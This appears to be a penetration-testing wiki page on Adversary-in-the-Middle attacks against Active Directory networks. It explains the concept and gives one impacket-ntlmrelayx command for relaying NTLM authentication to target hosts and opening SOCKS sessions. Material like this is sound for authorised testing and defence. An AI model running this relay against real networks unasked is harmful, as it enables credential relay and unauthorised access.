Adversary-In-The-Middle

Adversary-in-The-Middle (AiTM), also known as Man-in-The-Middle (MiTM), is where an attacker inserts themselves between two communicating parties to intercept, monitor, and potentially manipulate the communication.

AiTM is a popular attack path many penetration testers will attempt early on during an internal penetration test for lower/medium maturity organizations. Many configurations that are exploited to obtain AiTM are due to default configurations within Active Directory, and some of the remediations can be hard to implement in some instances.

I recommend reading the pages in this section to understand each tool and what it exploits, but here is an example of the three tools I run in this specific order:

Start impacket-ntlmrelayx to relay authentication traffic to other computers and create remote SOCKS sessions if successful

Linux (Attacker)

impacket-ntlmrelayx -6 -wh [hostname].[domain] -tf [targets] -of socks -socks -smb2support

PreviousPowerView NextNBT-NS/LLMNR/MDNS

Last updated 10 months ago